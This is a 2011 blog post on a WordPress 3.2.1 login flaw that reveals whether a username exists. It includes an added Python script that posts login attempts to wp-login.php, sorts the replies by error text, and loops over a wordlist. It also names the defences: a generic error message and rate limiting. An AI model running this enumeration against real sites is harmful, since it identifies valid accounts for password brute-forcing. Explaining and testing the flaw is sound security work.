Tuesday 27 September 2011

WordPress 3.2.1 user enumeration vulnerability

As we all know, banks are not the only ones with user enumeration vulnerabilities in their web applications :)
Most of the time "user enumeration" is possible because the login process reports 'wrong credentials' badly: the error message reveals whether it was the username or the password that failed.
So, let's see how it looks in the new WordPress (3.2.1).

(In pseudo code):

    if user_ok  --> echo 'user ok' (the username exists, only the password was wrong)
    else        --> echo 'username invalid'
    ...

So that's the simple way to enumerate users (and a ready starting point for brute force) ;)
Here is a simple tool I wrote to check whether an 'admin' account exists (the tool itself is not reproduced on this page):

As you can see, this simple tool only tests 'admin'. The idea is simple: check whether a given name exists (wordlist? ;) ), and if it does, analyse/log the response.
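The same idea in working code, as an added example (this is not the author's tool from the post, which is not reproduced here): a classifier that reads the wp-login.php error text and a loop that runs a wordlist through it. The exact error fragments ('Invalid username' versus 'The password you entered for the username ... is incorrect') are an assumption based on wp-login.php in the WordPress 3.x series; confirm them against your target before trusting the result. The sample responses below are constructed so the script runs offline; probe_wp_login() is the network version for a real target.

```python
"""
Added example: WordPress 3.x style user enumeration via distinct login errors.
Not the original post's tool. Error strings are an assumption (WP 3.x wp-login.php).
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

# Assumed WordPress 3.x error fragments; verify against the target's wp-login.php.
INVALID_USER_MARKER = "Invalid username"
WRONG_PASSWORD_MARKER = "The password you entered for the username"


def classify_login_response(html: str) -> str:
    """Map a wp-login.php response body to 'invalid_user', 'valid_user' or 'unknown'.

    'unknown' is what you get once the site returns one uniform error for
    both cases (the fix for this bug), so it is the signal that enumeration
    by error text no longer works.
    """
    if INVALID_USER_MARKER in html:
        return "invalid_user"
    if WRONG_PASSWORD_MARKER in html:
        return "valid_user"
    return "unknown"


def probe_wp_login(base_url: str, username: str, password: str = "x") -> str:
    """POST one login attempt to <base_url>/wp-login.php and return the HTML.

    Network code for real use; the offline test below uses fake_probe instead.
    Field names (log, pwd, wp-submit) are the standard WordPress login form fields.
    """
    form = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}
    ).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/wp-login.php",
        data=form,
        headers={"User-Agent": "Mozilla/5.0"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def enumerate_users(wordlist: Iterable[str], probe: Callable[[str], str]) -> Dict[str, List[str]]:
    """Run every candidate name through probe() and group them by classification.

    probe is injected so the same loop works against a live site
    (lambda u: probe_wp_login(url, u)) or against canned responses.
    """
    found: Dict[str, List[str]] = {"valid_user": [], "invalid_user": [], "unknown": []}
    for name in wordlist:
        found[classify_login_response(probe(name))].append(name)
    return found


# Constructed sample responses standing in for a WordPress 3.2.1 wp-login.php page.
SAMPLE_RESPONSES = {
    "admin": '<div id="login_error"><strong>ERROR</strong>: The password you entered '
             'for the username <strong>admin</strong> is incorrect.</div>',
    "editor": '<div id="login_error"><strong>ERROR</strong>: The password you entered '
              'for the username <strong>editor</strong> is incorrect.</div>',
    "root": '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>',
}
UNKNOWN_USER_RESPONSE = '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'


def fake_probe(username: str) -> str:
    """Offline stand-in for probe_wp_login() using the constructed responses."""
    return SAMPLE_RESPONSES.get(username, UNKNOWN_USER_RESPONSE)


if __name__ == "__main__":
    # Wordlist is constructed; against a live site pass lambda u: probe_wp_login(URL, u).
    for kind, names in enumerate_users(["admin", "root", "editor", "test"], fake_probe).items():
        print(f"{kind}: {names}")
```

The defensive check is the mirror image: if the site returns one generic message for both a bad username and a bad password (in WordPress this is what the `login_errors` filter is for), classify_login_response() returns 'unknown' for every name and the wordlist loop learns nothing. Rate limiting on wp-login.php is still needed separately, since this same loop is the front half of a password brute force.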

Regards! 



*Update 12.03.2012*
If you want more information about vulnerabilities in the latest WordPress,
try here ;)
